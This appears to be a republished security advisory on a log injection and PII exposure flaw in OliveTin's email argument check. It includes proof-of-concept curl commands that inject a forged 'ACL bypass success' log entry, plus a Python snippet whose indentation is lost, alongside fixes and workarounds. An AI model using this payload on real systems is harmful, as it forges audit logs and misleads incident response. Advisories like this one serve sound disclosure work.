Listen to this Post
The vulnerability stems from the `typeSafetyCheckEmail()` function in service/internal/executor/arguments.go, which calls `log.Errorf()` on every invocation, regardless of whether the email validation succeeds or fails. This means every email address processed by the application is written to the ERROR-level logs. Because the log entry uses the `%v` format verb on the raw user input, it does not escape newline or control characters. An attacker can submit a carefully crafted email address containing newlines and fake log data. The application writes this input verbatim to the log, creating forged log entries. In deployments using centralized logging systems like ELK or Splunk, these injected lines are parsed as legitimate events. This allows an attacker to create fake security alerts, manipulate audit trails, or cause alert fatigue by generating false positives. The vulnerable code path is only reachable when an action uses `exec:` mode, which is the documented mode for email-type arguments. The `shell:` mode blocks the argument before this function is called.
Platform: OliveTin
Version: 3000.11.1
Vulnerability : Log Injection/PII
Severity: High
date: 2026-03-12
Prediction: Patch within 2 weeks
What Undercode Say:
Analysis:
This vulnerability is a classic example of development debt where debug code remains in a production release. The core issue combines unnecessary error-level logging with unsanitized output. The PII exposure aspect creates GDPR compliance risks, as email addresses are written to long-term storage in centralized logs. The log injection vector is particularly dangerous for organizations using automated log monitoring, as it allows attackers to trigger false security alerts. This could lead to real incidents being ignored due to alert fatigue. The vulnerability affects only `exec:` mode actions, but since this is the recommended configuration for email-type arguments, the impact scope is broad.
Bash Commands and Codes:
Get binding ID for vulnerable action
BINDING=$(curl -s -X POST http://localhost:1337/api/GetDashboard \
-H "Content-Type: application/json" -d '{}' | \
python3 -c "
import sys,json
d=json.load(sys.stdin)
def f(o):
if isinstance(o,dict):
a=o.get('action')
if a and isinstance(a,dict):
for arg in a.get('arguments',[]):
if arg.get('type')=='email': print(a['bindingId'])
[f(v) for v in o.values()]
elif isinstance(o,list): [f(i) for i in o]
f(d)")
echo "Binding: $BINDING"
Trigger PII exposure (valid email)
curl -s -X POST http://localhost:1337/api/StartAction \
-H "Content-Type: application/json" \
-d "{\"bindingId\":\"$BINDING\",\"arguments\":[{\"name\":\"recipient\",\"value\":\"[email protected]\"}]}"
View exposed PII in logs
docker logs olivetin-test 2>&1 | grep "Email check"
Log injection attack
curl -s -X POST http://localhost:1337/api/StartAction \
-H "Content-Type: application/json" \
-d "{\"bindingId\":\"$BINDING\",\"arguments\":[{\"name\":\"recipient\",\"value\":\"[email protected]\nlevel=\\"error\\" msg=\\"ACL bypass success\\" username=\\"admin\\"\"}]}"
Verify injected log entry
docker logs olivetin-test 2>&1 | grep -E "Email check|ACL_bypass" | tail -5
How Exploit:
An attacker first identifies an OliveTin action that accepts an email-type argument. They obtain the binding ID for this action via the GetDashboard API endpoint. For PII harvesting, they submit valid email addresses and monitor the ERROR logs where these addresses are written. For log injection, they craft an email value containing newline characters followed by structured log data in the format expected by the logging system (logfmt or JSON). The application’s vulnerable logging function writes this entire string without sanitization. When viewed in centralized logging tools, the injected content appears as a separate log entry with the attacker-controlled level and message. This can simulate security events, authentication failures, or any other log type the monitoring system tracks.
Protection from this CVE:
Immediately update to the latest patched version of OliveTin once available. As a temporary workaround, avoid using `exec:` mode with email-type arguments and use `shell:` mode instead, which blocks the vulnerable code path. For code-level fix, modify `typeSafetyCheckEmail()` to log only on validation failure, use DEBUG level instead of ERROR, and never log the actual email value. Implement proper log sanitization to escape newlines and control characters. Review all logging statements for similar issues where user input is written directly to logs. Consider implementing a log sanitization middleware that strips or escapes control characters before logs are written. Monitor centralized logging systems for unexpected log entries that may indicate exploitation attempts.
Impact:
Organizations running OliveTin version 3000.11.1 with email-type actions in `exec:` mode face GDPR/CCPA compliance violations due to PII exposure in logs. Security operations centers using SIEM systems may receive false alerts generated by attackers, leading to misdirected incident response and potential real incidents being ignored. On-call engineers experience alert fatigue from continuous ERROR-level logs generated by legitimate email submissions. If email-type arguments are used for tokens or API keys, these secrets may appear in plaintext in logs. The log injection vector persists in centralized logging systems, potentially affecting long-term audit trail integrity and forensic investigations.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

